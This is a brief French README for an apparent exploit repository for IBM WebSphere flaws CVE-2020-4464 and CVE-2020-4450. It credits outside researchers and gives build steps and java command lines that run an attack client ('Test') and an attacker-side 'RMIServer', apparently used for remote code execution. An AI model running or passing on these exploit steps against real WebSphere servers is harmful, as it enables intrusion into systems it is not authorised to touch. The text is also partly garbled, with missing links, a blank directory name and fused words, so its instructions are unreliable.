
CVE-2020-4464 / CVE-2020-4450
=========================================================
Ceci est basé sur les excellents articles de blog de ZDI (rapport original par @_tint0):
... et le travail de quelques talentueux hackers chinois (je n'ai pas pu déterminer la véritable source du code, n'hésitez pas à ouvrir une Issue si vous pensez mériter le crédit):
Mes ajouts (pas grand-chose, vraiment):
Le code de FoxGlove est intégré comme sous-module, vous pouvez utiliser le fichier de requête WebSphere pour déclencher CVE-2020-4464.
Vous devez copier les répertoires plugins et runtimes de WebSphere vers le répertoire , puis exécuter pour compiler!
libantPour exécuter (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer